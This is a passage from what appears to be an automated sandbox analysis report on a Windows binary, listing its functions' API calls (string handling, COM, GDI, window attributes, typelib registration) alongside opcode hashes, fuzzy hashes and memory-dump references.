                                                                                                                                                                                                              • Instruction ID: 38623bb3983b0f5c706ffa1cbbbd9de035bc6e4718832a96f6c96e5b5160e0a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da8d3ab3432ba93097c6bc775de03b17d457751da0abb236245142e9d455c8df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A061D338940269DFCF35DF29C8813ADBBA0AB41714F2C555AEC92DB280C77097C1CB89
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00C4E7A7
                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00C4E7EA
                                                                                                                                                                                                                • Part of subcall function 00C4DE8E: CharLowerBuffW.USER32(?,?), ref: 00C4DEAE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C4E9EA
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00C4E9FD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3659485706-0
                                                                                                                                                                                                              • Opcode ID: 6e2e221af8884634a42d3709fef86752fa70c96ed21692e19c42d667455b8d0b
                                                                                                                                                                                                              • Instruction ID: 3229f597cb00bd77e2086ca70c3a0065de75c7f3f2567294330d37586aa9b2e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e2e221af8884634a42d3709fef86752fa70c96ed21692e19c42d667455b8d0b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52C15A71A083019FC714DF28C48096ABBE5FF89714F15896EF899DB351D731EA46CB82
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00C487AD
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00C487B8
                                                                                                                                                                                                                • Part of subcall function 00C5DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?), ref: 00C5DF71
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00C487C3
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00C48A94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 780911581-0
                                                                                                                                                                                                              • Opcode ID: d5184fa958d13ab1ae692fd0209324af99f1c413bf7c51e88bd7649d7b866c2f
                                                                                                                                                                                                              • Instruction ID: 71ef8c1ae4d8a08803fc589b5ff644d64b1df29f4988b3ddc30d86ce242f0fa5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5184fa958d13ab1ae692fd0209324af99f1c413bf7c51e88bd7649d7b866c2f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4A17A35604B019FDB10DF15C485B2EB7E5BF88314F14889AF996AB3A1DB70ED48CB92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fassign
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                                                                              • Opcode ID: 78065e5dbb6b475e8d25eac4a3c61c397d1e02eeb3f1842aa2bf8a4622faa006
                                                                                                                                                                                                              • Instruction ID: e302c5cf1f69223b43d77a2fd9e53f4d8629b8c64402e496d36729da84043b29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78065e5dbb6b475e8d25eac4a3c61c397d1e02eeb3f1842aa2bf8a4622faa006
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B918D75D0031AEFDF24CFA5C8456EEB7B4EF41314F2480AAE815EA250E7316B81CB59
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C28308
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00C28320
                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 00C28345
                                                                                                                                                                                                              • _memcmp.LIBCMT ref: 00C28366
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 314563124-0
                                                                                                                                                                                                              • Opcode ID: 28d091698d275fcebf42925c13b7466e7900d29b6259f3752f0cc0aed98ed33f
                                                                                                                                                                                                              • Instruction ID: c57f7509b8e9c96e7ad92c627f8b66edaf72a90a70de421bef07baaa08e98e59
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28d091698d275fcebf42925c13b7466e7900d29b6259f3752f0cc0aed98ed33f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7813B71A01119EFCB04DFD4C884EEEB7B9FF89315F244598E515AB250DB71AE0ACB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C2A68A
                                                                                                                                                                                                              • __itow.LIBCMT ref: 00C2A6BB
                                                                                                                                                                                                                • Part of subcall function 00C2A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C2A976
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C2A724
                                                                                                                                                                                                              • __itow.LIBCMT ref: 00C2A77B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$__itow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3379773720-0
                                                                                                                                                                                                              • Opcode ID: a3025b745a4d64b659dc865d611b67c878e2af1d6f3c9224eccfe4c883ec7d96
                                                                                                                                                                                                              • Instruction ID: acd1ec383518137c7e6b344cd7ffbe91a80cde8e09dc4937d06d9827aad2a73d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3025b745a4d64b659dc865d611b67c878e2af1d6f3c9224eccfe4c883ec7d96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E41E074A00258AFDF20EF55DC46BEE7BF9EF44B50F100469F915A3281DB709A84CBA2
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C0642B
                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00C06459
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C06487
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C064BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                              • Opcode ID: ff0aab0bedb76b573b9f7b3725a1c5bea5ed0cbe6ced60050866476822ba86e8
                                                                                                                                                                                                              • Instruction ID: 10f9b3badf93bf0cb77aaf29688a2865a1e66e51666b25d880d63906c614c10c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff0aab0bedb76b573b9f7b3725a1c5bea5ed0cbe6ced60050866476822ba86e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31AF31600256AFDF21CFA5CC44BAA7BE9FF41720F154069E8649B1D1DB31EA60DB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00C563BD
                                                                                                                                                                                                              • SetWindowLongW.USER32 ref: 00C563D7
                                                                                                                                                                                                              • SetWindowLongW.USER32 ref: 00C563E5
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32 ref: 00C563F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                                                              • Opcode ID: 0451a3bc9031ff26d8b81f1892aaba60b0cbb0501ad76b3e63702e234866c739
                                                                                                                                                                                                              • Instruction ID: 396b99f996409037cd6b85c9c8bf87fe7db5f6a3a9b0e749aba638390ebf00b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0451a3bc9031ff26d8b81f1892aaba60b0cbb0501ad76b3e63702e234866c739
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511EE35300414AFD715AB24DC44FBEB7A9EF85320F14425AF826DB3E2DBA0AD408B98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00C2F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C2E46F,?,?,?,00C2F262,00000000,000000EF,00000119,?,?), ref: 00C2F867
                                                                                                                                                                                                                • Part of subcall function 00C2F858: lstrcpyW.KERNEL32(00000000,?), ref: 00C2F88D
                                                                                                                                                                                                                • Part of subcall function 00C2F858: lstrcmpiW.KERNEL32(00000000,?,00C2E46F,?,?,?,00C2F262,00000000,000000EF,00000119,?,?), ref: 00C2F8BE
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C2E488
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00C2E4AE
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C2E4E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                                                              • Opcode ID: e6eef23d45b30c79d18f4f6ce630fa7e5bdd84d2fd5aaa23c762e7c3054e6469
                                                                                                                                                                                                              • Instruction ID: 1c1d867e3b08264465d7e037917365158b5b7f633680aa2bd25bee32b327c0a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6eef23d45b30c79d18f4f6ce630fa7e5bdd84d2fd5aaa23c762e7c3054e6469
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E11BE3A200359AFDB25AF64E845E7E77A8FF46350B40403AF906CB6A0EB719940D791
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C34385
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00C343A6
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00C343F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C34401
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1157408455-0
                                                                                                                                                                                                              • Opcode ID: 451a80f47d4d04752c7ea513658f462e815ae658b51886b759783b94b2f0e88b
                                                                                                                                                                                                              • Instruction ID: 511b6e995d9edb6f2321add866930d3295573a7da410cd6eff1bb5bcc4dd37b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 451a80f47d4d04752c7ea513658f462e815ae658b51886b759783b94b2f0e88b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26110D719012287AD7309BA5AC4DFEFBB7CEF45720F10459AF908E7290D6744F808BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWindowExW.USER32 ref: 00BD214F
                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00BD2163
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BD216D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                                                              • Opcode ID: c20597bbf0018532bc7ca2c7546719571ad7b16948bc2678f931564bb7450386
                                                                                                                                                                                                              • Instruction ID: bee64c41097d85b5319fbaa6bd789d8db493d9be9b3d339396b528a577e47718
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c20597bbf0018532bc7ca2c7546719571ad7b16948bc2678f931564bb7450386
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F118B72501189BFDB128F90DC84FEBBBA9EF68354F144252FB0462260D771DC60EBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C5E1EA
                                                                                                                                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00C5E201
                                                                                                                                                                                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00C5E216
                                                                                                                                                                                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00C5E234
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1352324309-0
                                                                                                                                                                                                              • Opcode ID: 0a0e913b7c0b99936fe24d4bab7aec10287d3e69d02eae50d372034e4f82d103
                                                                                                                                                                                                              • Instruction ID: 79fa6be3974386022001a120b3b05150980cc874fed928fbaad8bb6ee3ecb021
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a0e913b7c0b99936fe24d4bab7aec10287d3e69d02eae50d372034e4f82d103
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 451165B92053049BE3348F52DD0CF977BBCEF00B05F108559AA16D6055DBB0E688DB95
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BD1729
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: SelectObject.GDI32(?,00000000), ref: 00BD1738
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: BeginPath.GDI32(?), ref: 00BD174F
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: SelectObject.GDI32(?,00000000), ref: 00BD1778
                                                                                                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C5C3E8
                                                                                                                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 00C5C3F5
                                                                                                                                                                                                              • EndPath.GDI32(00000000), ref: 00C5C405
                                                                                                                                                                                                              • StrokePath.GDI32(00000000), ref: 00C5C413
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1539411459-0
                                                                                                                                                                                                              • Opcode ID: b1cb537a93e3f00df4e0e259661cbe7d03a1eb4fa7a77dd27a09b20c1a1132bb
                                                                                                                                                                                                              • Instruction ID: 677fff1a7d92883f104278a58f88f99f3833737b26aa6a17c35c78c81b19a344
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1cb537a93e3f00df4e0e259661cbe7d03a1eb4fa7a77dd27a09b20c1a1132bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F0BE31005218BBDB222F56AC0DFDE3F99AF06311F148000FA11311E187B55654EBA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSysColor.USER32 ref: 00BD260D
                                                                                                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00BD2617
                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00BD262C
                                                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 00BD2634
                                                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00C0C1C4
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C0C1D1
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00C0C1EA
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00C0C203
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00C0C223
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00C0C22E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1946975507-0
                                                                                                                                                                                                              • Opcode ID: 916078971b0a9e720112acae57e39d8b3bb103789a5d82cbb7b75694ce4c975d
                                                                                                                                                                                                              • Instruction ID: 5585f063601a6b7cedd45b53cfcfa6bdfc5e07769bea5dd6d96855773f3e7988
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 916078971b0a9e720112acae57e39d8b3bb103789a5d82cbb7b75694ce4c975d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E06531504244BBDB315F65AC497DD3B11EB16332F1483A6FA79580E187B14680DB11
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00C10679
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00C10683
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C106A3
                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 00C106C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                              • Opcode ID: 1741a3f3c94b7c3ebd0014117acce53ef88574009da90571a630e1d78fe62abf
                                                                                                                                                                                                              • Instruction ID: e0655273c0bfd792e2854e9694f4b5ddc42425bdfd135ba2431bc9b45d878263
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1741a3f3c94b7c3ebd0014117acce53ef88574009da90571a630e1d78fe62abf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0E01A75804204EFCB119F62D808B9EBBF1EF8C310F218016FC5AA7350DBB885919F50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00C1068D
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00C10697
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C106A3
